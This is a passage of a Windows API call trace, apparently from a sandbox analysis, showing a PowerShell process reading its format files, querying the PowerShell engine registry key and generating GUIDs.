	[0525.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0525.951] SetErrorMode (uMode=0x1) returned 0x1
	[0525.952] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0525.952] GetFileType (hFile=0x320) returned 0x1
	[0525.952] SetErrorMode (uMode=0x1) returned 0x1
	[0525.952] GetFileType (hFile=0x320) returned 0x1
	[0525.952] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.953] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.953] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.953] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.954] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.954] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.954] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.954] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.955] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.955] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.956] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.956] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.956] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.956] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.956] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.957] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.957] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.957] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0xbce, lpOverlapped=0x0) returned 1
	[0525.958] ReadFile (in: hFile=0x320, lpBuffer=0x2d072ee, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d072ee*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0525.958] ReadFile (in: hFile=0x320, lpBuffer=0x2d07bb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2d07bb8*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0525.958] CloseHandle (hObject=0x320) returned 1
	[0525.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0525.958] SetErrorMode (uMode=0x1) returned 0x1
	[0525.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecd60 | out: lpFileInformation=0xecd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0525.958] SetErrorMode (uMode=0x1) returned 0x1
	[0525.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0525.959] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x320) returned 0x0
	[0525.959] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0525.959] CoTaskMemAlloc (cb=0x5a) returned 0x32ca00
	[0525.959] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x32ca00, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0525.959] CoTaskMemFree (pv=0x32ca00) 
	[0525.959] RegCloseKey (hKey=0x320) returned 0x0
	[0525.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0525.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0525.961] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x23732f04, Data2=0xb4ce, Data3=0x412f, Data4=([0]=0xb6, [1]=0xc, [2]=0xc4, [3]=0xe8, [4]=0x58, [5]=0xb0, [6]=0x34, [7]=0x40))) returned 0x0
	[0525.961] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x1e3b20f4, Data2=0x7365, Data3=0x469f, Data4=([0]=0x82, [1]=0xcb, [2]=0xa4, [3]=0x10, [4]=0xe7, [5]=0xbd, [6]=0xed, [7]=0x7c))) returned 0x0
	[0525.962] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x5a46ccfd, Data2=0x25cd, Data3=0x4e03, Data4=([0]=0xad, [1]=0x82, [2]=0xf, [3]=0xb0, [4]=0x56, [5]=0xdd, [6]=0xb8, [7]=0xd5))) returned 0x0
	[0525.963] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6b5303d7, Data2=0xd97f, Data3=0x4da0, Data4=([0]=0x8e, [1]=0xc8, [2]=0x39, [3]=0x72, [4]=0x19, [5]=0x2e, [6]=0x56, [7]=0xf5))) returned 0x0
	[0525.963] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xbefa18e9, Data2=0x1e6b, Data3=0x4700, Data4=([0]=0x9e, [1]=0xe7, [2]=0x12, [3]=0x66, [4]=0x64, [5]=0x64, [6]=0x94, [7]=0x74))) returned 0x0
	[0525.964] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xac51daa9, Data2=0x9b2d, Data3=0x441a, Data4=([0]=0xa7, [1]=0x1d, [2]=0x87, [3]=0x83, [4]=0x52, [5]=0xb0, [6]=0xd4, [7]=0x97))) returned 0x0
	[0525.964] VirtualQuery (in: lpAddress=0xeba20, lpBuffer=0xec8e0, dwLength=0x30 | out: lpBuffer=0xec8e0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0525.965] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x16085f52, Data2=0x4100, Data3=0x4952, Data4=([0]=0xb1, [1]=0x9a, [2]=0x95, [3]=0x3c, [4]=0x28, [5]=0xb9, [6]=0x82, [7]=0xf8))) returned 0x0
	[0525.965] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x9b83e7b7, Data2=0xc14, Data3=0x4470, Data4=([0]=0x9b, [1]=0xb3, [2]=0x1e, [3]=0xf2, [4]=0x91, [5]=0xc8, [6]=0xc6, [7]=0xe7))) returned 0x0
	[0525.965] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xc6c0243c, Data2=0x80e7, Data3=0x4319, Data4=([0]=0x9b, [1]=0x41, [2]=0xd1, [3]=0xa4, [4]=0x91, [5]=0x7f, [6]=0x8f, [7]=0x1d))) returned 0x0
	[0525.965] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x96d1573d, Data2=0x774f, Data3=0x478b, Data4=([0]=0x94, [1]=0xa5, [2]=0x46, [3]=0x34, [4]=0x21, [5]=0xbd, [6]=0xcd, [7]=0x2f))) returned 0x0
	[0525.965] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xf77975ee, Data2=0x77ec, Data3=0x4d0d, Data4=([0]=0x85, [1]=0xb8, [2]=0x34, [3]=0x54, [4]=0x25, [5]=0x6a, [6]=0xb0, [7]=0x1e))) returned 0x0
	[0525.965] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xabd61e27, Data2=0x3d72, Data3=0x4181, Data4=([0]=0xb1, [1]=0xd5, [2]=0x77, [3]=0x58, [4]=0xe7, [5]=0x20, [6]=0x80, [7]=0x12))) returned 0x0
	[0525.966] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xca1c15c6, Data2=0x69e, Data3=0x483b, Data4=([0]=0x97, [1]=0x88, [2]=0xc3, [3]=0xf8, [4]=0xf7, [5]=0xc3, [6]=0x8c, [7]=0x27))) returned 0x0
	[0525.966] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x33c3888, Data2=0xbe34, Data3=0x4ae8, Data4=([0]=0xb0, [1]=0xd1, [2]=0xda, [3]=0x7e, [4]=0xf3, [5]=0x1d, [6]=0xaa, [7]=0x33))) returned 0x0
	[0525.966] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x71dda048, Data2=0x3e1e, Data3=0x4cc1, Data4=([0]=0xa5, [1]=0xc, [2]=0xb1, [3]=0x99, [4]=0xa4, [5]=0xf9, [6]=0x5e, [7]=0x13))) returned 0x0
	[0525.966] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x411c7b9f, Data2=0xfc84, Data3=0x434e, Data4=([0]=0x9b, [1]=0xd8, [2]=0x54, [3]=0xca, [4]=0x8e, [5]=0xf9, [6]=0xef, [7]=0xfe))) returned 0x0
	[0525.966] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x5c23181a, Data2=0x8b03, Data3=0x4a8b, Data4=([0]=0x9d, [1]=0xec, [2]=0xa4, [3]=0x19, [4]=0xed, [5]=0xe3, [6]=0x8f, [7]=0xc5))) returned 0x0
	[0525.966] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x7689fe11, Data2=0xdf29, Data3=0x47df, Data4=([0]=0x9c, [1]=0xa5, [2]=0x12, [3]=0xac, [4]=0x8b, [5]=0xa1, [6]=0x43, [7]=0x17))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x93b32995, Data2=0x1319, Data3=0x42e2, Data4=([0]=0x9f, [1]=0xb6, [2]=0x5, [3]=0xb2, [4]=0xda, [5]=0xc9, [6]=0x44, [7]=0xb5))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xec6085a, Data2=0x2610, Data3=0x448f, Data4=([0]=0xb2, [1]=0x92, [2]=0xa6, [3]=0x63, [4]=0xd1, [5]=0x95, [6]=0xa2, [7]=0xee))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xa9bc02ac, Data2=0xa2a, Data3=0x44f0, Data4=([0]=0x8d, [1]=0xc1, [2]=0x94, [3]=0xc9, [4]=0x33, [5]=0xdc, [6]=0x27, [7]=0xd7))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xd0541555, Data2=0x63b1, Data3=0x4479, Data4=([0]=0x9e, [1]=0xa8, [2]=0x7, [3]=0x18, [4]=0x29, [5]=0xc2, [6]=0x8, [7]=0x2b))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6f983a8a, Data2=0xde7f, Data3=0x4202, Data4=([0]=0x81, [1]=0x9c, [2]=0xd4, [3]=0x29, [4]=0x3d, [5]=0x5f, [6]=0x4d, [7]=0xcb))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x68bf5466, Data2=0x15ab, Data3=0x4e79, Data4=([0]=0x97, [1]=0x41, [2]=0x7a, [3]=0x74, [4]=0x16, [5]=0xf2, [6]=0x94, [7]=0xa))) returned 0x0
	[0525.967] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x57b09b57, Data2=0xbb2f, Data3=0x45d6, Data4=([0]=0xa0, [1]=0xe4, [2]=0x87, [3]=0x33, [4]=0xa1, [5]=0xb3, [6]=0xe4, [7]=0xae))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xf8071450, Data2=0xcfe1, Data3=0x46c8, Data4=([0]=0xad, [1]=0x4d, [2]=0x34, [3]=0xa9, [4]=0xd6, [5]=0xe, [6]=0x6f, [7]=0xf8))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xda604cfc, Data2=0xb99b, Data3=0x4282, Data4=([0]=0xbc, [1]=0xd1, [2]=0xc3, [3]=0x8e, [4]=0x21, [5]=0x7a, [6]=0x9f, [7]=0xfa))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x211cd3f0, Data2=0xd820, Data3=0x4aac, Data4=([0]=0x93, [1]=0x6a, [2]=0xd0, [3]=0xd, [4]=0x59, [5]=0xdc, [6]=0x79, [7]=0x57))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x865cae3e, Data2=0xde86, Data3=0x45bc, Data4=([0]=0x9f, [1]=0x6f, [2]=0xdd, [3]=0x30, [4]=0xdc, [5]=0x24, [6]=0x2c, [7]=0xbf))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x17f1ba2c, Data2=0x34ab, Data3=0x44b4, Data4=([0]=0x99, [1]=0x8, [2]=0x54, [3]=0xf1, [4]=0x21, [5]=0xda, [6]=0x9b, [7]=0x6b))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xda6b0931, Data2=0xf92f, Data3=0x4511, Data4=([0]=0xb4, [1]=0xfc, [2]=0xdf, [3]=0x5, [4]=0xb, [5]=0x9d, [6]=0xce, [7]=0x86))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x5ff36b1e, Data2=0x5f2e, Data3=0x406f, Data4=([0]=0xba, [1]=0x81, [2]=0x60, [3]=0x25, [4]=0xd0, [5]=0x95, [6]=0x8e, [7]=0xfb))) returned 0x0
	[0525.968] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x78b886cb, Data2=0xe5c, Data3=0x4a15, Data4=([0]=0xa1, [1]=0xa8, [2]=0xe6, [3]=0xca, [4]=0x3e, [5]=0x68, [6]=0xf8, [7]=0x81))) returned 0x0
	[0525.969] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x1db42f1d, Data2=0x394e, Data3=0x45dd, Data4=([0]=0x82, [1]=0x3f, [2]=0x4e, [3]=0x4, [4]=0x7e, [5]=0xba, [6]=0x87, [7]=0xd7))) returned 0x0
	[0525.969] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xa919f3a4, Data2=0x534a, Data3=0x4b50, Data4=([0]=0x96, [1]=0xbc, [2]=0x78, [3]=0x90, [4]=0x4a, [5]=0x41, [6]=0xb5, [7]=0xd3))) returned 0x0
	[0525.969] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x71ff96be, Data2=0x9060, Data3=0x4c4f, Data4=([0]=0x99, [1]=0x7, [2]=0x9f, [3]=0x71, [4]=0xbb, [5]=0xad, [6]=0x62, [7]=0xca))) returned 0x0
	[0525.970] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x5ee7d41a, Data2=0x8102, Data3=0x4197, Data4=([0]=0xb8, [1]=0xf7, [2]=0xbd, [3]=0x91, [4]=0xb4, [5]=0x95, [6]=0x58, [7]=0x84))) returned 0x0
	[0525.970] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0525.970] GetFileType (hFile=0x320) returned 0x1
	[0525.970] SetErrorMode (uMode=0x1) returned 0x1
	[0525.970] GetFileType (hFile=0x320) returned 0x1
	[0525.970] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.971] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.971] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.972] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.972] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.972] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0525.972] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x119, lpOverlapped=0x0) returned 1
	[0525.972] ReadFile (in: hFile=0x320, lpBuffer=0x2e181a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x2e181a0*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0526.786] CloseHandle (hObject=0x320) returned 1
	[0526.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0526.787] SetErrorMode (uMode=0x1) returned 0x1
	[0526.787] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecd60 | out: lpFileInformation=0xecd60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0526.787] SetErrorMode (uMode=0x1) returned 0x1
	[0526.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0526.787] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x320) returned 0x0
	[0526.787] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0526.787] CoTaskMemAlloc (cb=0x5a) returned 0x32ca00
	[0526.787] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x32ca00, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0526.787] CoTaskMemFree (pv=0x32ca00) 
	[0526.788] RegCloseKey (hKey=0x320) returned 0x0
	[0526.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0526.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0526.788] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x9bf4220e, Data2=0x54, Data3=0x4b00, Data4=([0]=0x83, [1]=0x90, [2]=0x4e, [3]=0xc5, [4]=0x96, [5]=0x11, [6]=0xdc, [7]=0x9a))) returned 0x0
	[0526.789] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x810e9292, Data2=0x378b, Data3=0x4bdf, Data4=([0]=0xba, [1]=0xb0, [2]=0x7, [3]=0x36, [4]=0x11, [5]=0xf3, [6]=0xf2, [7]=0xf3))) returned 0x0
	[0526.789] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb38e46f7, Data2=0x533c, Data3=0x4d3c, Data4=([0]=0xaf, [1]=0xae, [2]=0x81, [3]=0x8d, [4]=0xf0, [5]=0xfa, [6]=0xf1, [7]=0xa1))) returned 0x0
	[0526.789] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xbd3dec3e, Data2=0x77e3, Data3=0x45e8, Data4=([0]=0xaa, [1]=0xe6, [2]=0x86, [3]=0x55, [4]=0xce, [5]=0xaf, [6]=0x85, [7]=0x68))) returned 0x0
